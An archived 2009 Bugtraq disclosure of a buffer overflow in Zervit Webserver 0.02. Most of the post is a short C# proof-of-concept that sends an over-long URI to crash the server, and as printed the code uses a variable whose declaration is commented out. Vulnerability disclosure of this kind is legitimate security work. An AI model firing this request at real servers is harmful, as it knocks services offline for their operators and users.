lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20090414212226.19574.qmail@securityfocus.com>
Date: 14 Apr 2009 21:22:26 -0000
From: ewizz@...cansecurity.com
To: bugtraq@...urityfocus.com
Subject: Zervit Webserver Buffer Overflow

#######  Zervit Webserver 0.02  Buffer Overflow 

########## By:      e.wiZz!

#########Site:   www.balcansecurity.com


######## Found with ServMeNot (world's sexiest fuzzer :P )



In the wild...

########################################################################################

######Vend0r site: http://www.ohloh.net/projects/mereo


/* When requested uri isn't found,it goes to char tmp[255],
and later it is used to output,you need 256 chars to overflow (check source "http.c") */

using System;
using System.IO;
using System.Net;
using System.Text;

class whatsoever
{
    static void Main()
    {
        // StringBuilder sb = new StringBuilder();

        //byte[] buf = new byte[8192];

        Console.WriteLine("Enter site: (http://localhost)");
        string sajt = Console.ReadLine();
        string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        HttpWebRequest request = (HttpWebRequest)
           
            WebRequest.Create(sajt+uribad);

        HttpWebResponse response = (HttpWebResponse)
            request.GetResponse();
        // you shouldn't see response
        Console.WriteLine(sb.ToString());
    }
}

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ